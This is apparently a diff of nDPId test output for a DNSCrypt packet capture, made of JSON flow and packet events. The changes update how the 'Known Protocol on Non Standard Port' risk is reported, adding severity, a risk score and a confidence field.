-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDcAub0RcygKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":946739312399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312399,"pkt":"ZmZmZmZmRERERERECABFAADUFOhAADYRDa1CVR5zCgAAAQG702AAwE8ILCiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="}
@@ -540,26 +540,26 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":946739312401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312401,"pkt":"ZmZmZmZmRERERERECABFAADUFOpAADYRDatCVR5zCgAAAQG7vUAAwGUnLCmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7t1AAL0RzDEKAAABXV\/ipbSvAbsCCALbx+wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t4gAL0R6HAKAAABXV\/ipcAiAbsGBEBnx+kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t4Aub0RDUQKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t8gAL0R6G8KAAABXV\/ipeMBAbsGBB2Gx+sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uBAAL0RzC4KAAABXV\/ipaSsAbsCCALbx+oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t8Aub0RDUMKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uFAAL0RzC0KAAABXV\/ipeY4AbsCCALbx+gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA